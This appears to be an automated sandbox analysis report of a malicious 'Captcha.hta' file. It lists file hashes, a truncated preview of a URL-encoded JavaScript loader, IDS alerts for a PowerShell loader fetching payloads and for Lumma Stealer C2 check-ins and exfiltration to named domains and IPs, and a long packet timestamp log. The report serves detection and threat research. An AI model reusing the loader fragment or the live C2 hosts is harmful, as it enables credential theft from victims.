                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\curl.exe
                                                                                                    File Type:ASCII text, with CR, LF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):478
                                                                                                    Entropy (8bit):2.9758009113154573
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivIdoUN0cQOIu:Vz6ykymUexb1U9cL9cddopcQnu
                                                                                                    MD5:51CBDCDE7B9A416AD4487C23C8476FD4
                                                                                                    SHA1:446F6F0AC1864F691328D3CFE59599598092B401
                                                                                                    SHA-256:630D30FDAC4DAB10DE1AEBBC05D7C1F1E7F544ECB52B5ED6E0D4569C7C1863B6
                                                                                                    SHA-512:E9938D52F2EE350B72D58D5E211464124B39BCC12E700D6C3EB5852219A5A7CFA84D22580F56CCC3E1E1F65521E457FDEB37242A5158AACC0947986B551FC3A6
                                                                                                    Malicious:false
                                                                                                    Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 1482 100 1482 0 0 1069 0 0:00:01 0:00:01 --:--:-- 1072..
                                                                                                    File type:HTML document, ASCII text, with very long lines (2048), with CRLF line terminators
                                                                                                    Entropy (8bit):3.47135137731597
                                                                                                    TrID:
                                                                                                      File name:Captcha.hta
                                                                                                      File size:2'091 bytes
                                                                                                      MD5:c8f045b16d3106cf269965b7fa2485dd
                                                                                                      SHA1:c3e7306fe8290c38b656a6a671e5e889c37f63a5
                                                                                                      SHA256:26eb8e2490888484e79cdd25b87257e5994a3ff084f0f9e54478f843a639c4e3
                                                                                                      SHA512:051d1725836b6e29b1c9b0e6dd191803e1de89c3816e527d77e82f6c43fdc33bc791f3526f246b441c6cc8065540ca0ef1d1de68545d506f16991d99b81443fa
                                                                                                      SSDEEP:24:q0d+2xhlCVKR581JlcwHHR/ubvp+l0Ezn5RJehY63OrFR5b:qaX3lrI3H90vglt5nCPwFn
                                                                                                      TLSH:7341B57C6621CC8EAC337D7BECA87F60D2549F13EDC9A6C4081540463FE1469B5587D9
                                                                                                      File Content Preview:<script language="javascript">..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%28%66%75%6E%63%74%69%6F
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-20T07:18:01.761536+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.449733147.45.44.13180TCP
                                                                                                      2024-12-20T07:18:02.605097+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.449733147.45.44.13180TCP
                                                                                                      2024-12-20T07:18:03.910798+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4608151.1.1.153UDP
                                                                                                      2024-12-20T07:18:04.143228+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.4653071.1.1.153UDP
                                                                                                      2024-12-20T07:18:05.860092+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449736172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:05.860092+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:06.583127+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:06.583127+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:07.813883+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449738172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:07.813883+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:08.586491+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449738172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:08.586491+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:10.149526+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449739172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:10.149526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:12.632007+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449740172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:12.632007+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:14.764171+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449741172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:14.764171+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:17.038616+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449743172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:17.038616+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:17.801318+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449743172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:19.432679+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449745172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:19.432679+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:23.912824+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449750172.67.197.170443TCP
                                                                                                      2024-12-20T07:18:23.912824+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750172.67.197.170443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 20, 2024 07:17:58.342103958 CET4973080192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:17:58.461867094 CET8049730147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:17:58.461971045 CET4973080192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:17:58.501565933 CET4973080192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:17:58.621288061 CET8049730147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:17:59.722228050 CET8049730147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:17:59.722258091 CET8049730147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:17:59.722321033 CET4973080192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:17:59.734966993 CET4973080192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:17:59.854877949 CET8049730147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:17:59.856215954 CET4973080192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:00.379544973 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:00.499385118 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:00.499542952 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:00.499728918 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:00.619345903 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761307955 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761365891 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761403084 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761434078 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761468887 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761504889 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761535883 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.761538029 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761535883 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.761574030 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761579037 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.761606932 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761643887 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.761646032 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.761754990 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.881292105 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.881371021 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.881537914 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.885437965 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.935286045 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.953121901 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.953238964 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.953324080 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.957212925 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.957319975 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.957473993 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.966752052 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.968719959 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.968780041 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.968822002 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.977137089 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.977210999 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.977252007 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.985475063 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.985565901 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.985584021 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.993926048 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:01.994024038 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:01.994062901 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.002321959 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.002407074 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.002427101 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.010740995 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.010801077 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.010837078 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.019876957 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.019917011 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.019980907 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.027543068 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.027678967 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.027745962 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.054950953 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.054990053 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.055042028 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.107137918 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.145294905 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.145360947 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.145602942 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.147614956 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.147747040 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.147808075 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.204627037 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.324654102 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.604983091 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.605022907 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.605097055 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.607239008 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.607342005 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.607409954 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.612140894 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.612215996 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.612282038 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.616997957 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.617129087 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.617227077 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.621804953 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.621920109 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.621988058 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.626636028 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.626745939 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.626820087 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.631496906 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.631635904 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.631683111 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.636297941 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.636416912 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.636879921 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.641179085 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.641248941 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.643013000 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.646006107 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.646100998 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.646167994 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.650840998 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.650965929 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.651022911 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.655697107 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.655770063 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.655983925 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.660558939 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.660615921 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.661288977 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.665364027 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.665549994 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.665606022 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.670363903 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.670404911 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.671274900 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.675064087 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.675194979 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.676038027 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.679889917 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.679992914 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.680048943 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.684742928 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.684866905 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.685256004 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.689619064 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.689701080 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.689769030 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.694462061 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.694551945 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.694612026 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.699273109 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.699369907 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.699433088 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.704138994 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.704250097 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.706558943 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.709005117 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.709091902 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.709146976 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.713877916 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.713996887 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.714060068 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.724605083 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.778992891 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.797070980 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.797132015 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.797245026 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.799453974 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.799675941 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.799925089 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.804322004 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.804450989 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.804513931 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.809123993 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.809247971 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.809561968 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.813972950 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.814063072 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.814527988 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.818824053 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.818970919 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.819061041 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.823805094 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.823893070 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.824114084 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.828533888 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.828655005 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.828711987 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.833365917 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.833467960 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.833525896 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.838210106 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.838325977 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.838452101 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.843118906 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.843245983 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.843409061 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.848014116 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.848150015 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.848229885 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.852755070 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.852969885 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.853436947 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.857647896 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.857719898 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.857986927 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.861079931 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.861171961 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.861248016 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.864562035 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.864670038 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.864718914 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.868057966 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.868159056 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.868324995 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.871530056 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.871654034 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.871709108 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.875006914 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.875144005 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.875211000 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.878518105 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.878685951 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.878741980 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.882009029 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.882082939 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.882508039 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.885493994 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.885600090 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.885658026 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.889020920 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.889074087 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.889130116 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.892498016 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.892628908 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.892688036 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.896018028 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.896127939 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.896207094 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.899519920 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.899631977 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.899683952 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.902945995 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.903062105 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.903126001 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.906440020 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.906605959 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.906661987 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.909059048 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.909148932 CET8049733147.45.44.131192.168.2.4
